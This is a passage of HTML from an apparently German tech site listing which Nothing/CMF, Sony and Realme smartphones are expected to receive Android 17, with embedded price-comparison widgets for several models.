															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>425,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="425,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 425,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>483,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="483,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 483,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>484,70 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="484,70 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 484,70 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>629,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="629,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 629,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Motorola</span>
													</div>
												<div class="price-comparison__price ">
						<span>799,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-price="799,99 €" data-vars-product-vendor="Motorola" aria-label="Deal anschauen bei Motorola für 799,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Nothing / CMF</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262b4daa"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Nothing-Phone-4a-Pro-7.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Nothing Phone 4a Pro 7" class="wp-image-3093077" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der Hersteller Nothing beziehungsweise CMF geht beim Design seiner Smartphones zwar einen eigenwilligen Weg, hält sich bei der Angabe verfügbarer Android-Updates aber an ein klares Prinzip. Alle Modelle erhalten mindestens drei große Android-Updates:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3089770/nothing-phone-4a-test.html" target="_blank" rel="noreferrer noopener">Phone 4a</a></li>



<li><a href="https://www.pcwelt.de/article/3099920/nothing-phone-4a-pro-test-2.html" target="_blank" rel="noreferrer noopener">Phone 4a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2633627/nothing-phone-3a-test.html" target="_blank" rel="noreferrer noopener">Phone 3a</a></li>



<li><a href="https://www.pcwelt.de/article/2633499/nothing-phone-3a-pro-hands-on.html" target="_blank" rel="noreferrer noopener">Phone 3a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2002927/nothing-phone-2-test.html" target="_blank" rel="noreferrer noopener">Phone (2)</a></li>



<li><a href="https://www.pcwelt.de/article/2259040/nichts-telefon-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a</a></li>



<li><a href="https://www.pcwelt.de/article/2425610/nothing-phone-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a Plus</a></li>



<li><a href="https://www.pcwelt.de/article/2768762/cmf-phone-2-pro-test.html" target="_blank" rel="noreferrer noopener">CMF Phone 2 Pro</a></li>
</ul>



<p><strong>Kein Android 17 mehr:</strong> Nothing Phone (1), CMF Phone 1.</p>



<p><strong>Nothing Phone 4a im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=iAIOaqIXfyfVf28VzW0Dp4eF8ZBoGX1q1h1phuB-jTR1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260619&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=iAIOaqIXfyfVf28VzW0Dp4eF8ZBoGX1q1h1phuB-jTR1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Nothing</span>
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-price="349,00 €" data-vars-product-vendor="Nothing" aria-label="Deal anschauen bei Nothing für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260619&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>389,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="389,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 389,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Sony</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262bbe83"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Sony-Xperia-1-VII-review-13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Sony Xperia 1 VII review 13" class="wp-image-2864514" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Sony kommuniziert besonders transparent, welche Smartphones noch Android-Updates erhalten. Daher ist die Liste hier sehr verlässlich.</p>



<p>Diese Geräte bekommen Android 17:</p>



<ul class="wp-block-list">
<li>Xperia 10 VII</li>



<li>Xperia 10 VI</li>



<li><a href="https://www.pcwelt.de/article/3007641/sony-xperia-1-vii-test.html" target="_blank" rel="noreferrer noopener">Xperia 1 VII</a></li>



<li>Xperia 1 VI</li>
</ul>



<p><strong>Kein Update auf Android 17:</strong> Xperia 1 IV, Xperia 1 V, Xperia 5 IV, Xperia 5 V, Xperia 10 V.</p>



<p><strong>Sony Xperia 1 VII im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Sony</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-name="Sony Xperia 1 VII" data-vars-product-id="2815293" data-vars-category="Smartphones" data-vars-manufacturer-id="10057" data-vars-manufacturer="Sony" data-vars-vendor="amazon,Sony" data-vars-po="amazon" data-product="2815293" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Sony" aria-label="Deal anschauen bei Sony für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Realme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262c4341"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/PXL_20250904_104601692.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Realme GT 7 Dream Editon skärm" class="wp-image-2901166" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Der chinesische Hersteller Realme macht keine allzu genauen Angaben zu kommenden Updates, liefert aber voraussichtlich Android 17 auch an folgende Modelle aus:</p>



<ul class="wp-block-list">
<li>Realme 16 / Pro / Pro+</li>



<li>Realme 15 / 15T / Pro </li>



<li>Realme 14 / 14 T/ Pro / Pro+</li>



<li>Realme 13 / 13T/ Pro / Pro+</li>



<li>P4 / P4 Pro</li>



<li>Realme GT 8 / <a href="https://www.pcwelt.de/article/3056055/realme-gt-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Realme GT 7 / 7T / Pro</li>



<li>Realme GT 6 / 6T / Pro</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Realme GT Neo 5, GT Neo 3.</p>



<p><strong>Realme GT8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>899,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="899,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 899,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=UkJ8ChwNQIHRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlrUuujWQ6tV0QG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260619&amp;log=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=UkJ8ChwNQIHRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlrUuujWQ6tV0QG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
